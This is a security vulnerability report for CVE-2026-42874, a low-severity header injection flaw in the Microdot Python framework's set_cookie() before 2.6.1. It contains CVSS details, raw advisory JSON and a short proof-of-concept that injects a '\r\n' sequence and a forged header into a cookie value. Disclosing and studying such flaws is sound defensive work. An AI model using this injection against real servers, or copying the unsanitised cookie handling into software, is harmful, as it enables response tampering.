Security Vulnerability Report
中文
CVE-2026-42874 CVSS 3.7 LOW

CVE-2026-42874

Published: 2026-05-11 20:25:44
Last Modified: 2026-05-11 20:25:44

Description

Microdot is a minimalistic Python web framework. Prior to 2.6.1, the Response.set_cookie() method does not sanitize its string arguments, and in particular will not detect the presence of the \r\n sequence in them. This can be a potential source of header injection attacks. For a header injection attack through this issue to be possible, an attacker must first infiltrate the client (for example through an independent XSS attack), so that it can send malicious information that is destined to be stored in a cookie by the server on behalf of the victim. An attacker that infiltrates one client can only orchestrate a header injection attack for that client, all other clients that were not infiltrated are safe. This vulnerability is fixed in 2.6.1.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Microdot < 2.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
from microdot import Microdot, Response app = Microdot() @app.route('/set_cookie') def index(request): # Simulate attacker-controlled input (e.g., from XSS payload) # The '\r\n' sequence attempts to inject a new header malicious_value = "session_value\r\nX-Injected-Header: malicious_content" resp = Response() # Vulnerable method: does not sanitize '\r\n' resp.set_cookie('user_id', malicious_value) return "Cookie set. Check response headers." if __name__ == '__main__': app.run(debug=True)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42874", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:43.973", "lastModified": "2026-05-11T20:25:43.973", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microdot is a minimalistic Python web framework. Prior to 2.6.1, the Response.set_cookie() method does not sanitize its string arguments, and in particular will not detect the presence of the \\r\\n sequence in them. This can be a potential source of header injection attacks. For a header injection attack through this issue to be possible, an attacker must first infiltrate the client (for example through an independent XSS attack), so that it can send malicious information that is destined to be stored in a cookie by the server on behalf of the victim. An attacker that infiltrates one client can only orchestrate a header injection attack for that client, all other clients that were not infiltrated are safe. This vulnerability is fixed in 2.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-113"}]}], "references": [{"url": "https://github.com/miguelgrinberg/microdot/blob/main/CHANGES.md", "source": "[email protected]"}, {"url": "https://github.com/miguelgrinberg/microdot/commit/99b281b45faef8472410f2d56bfef496dfbd95d5", "source": "[email protected]"}, {"url": "https://github.com/miguelgrinberg/microdot/security/advisories/GHSA-7wc8-wvc4-m498", "source": "[email protected]"}]}}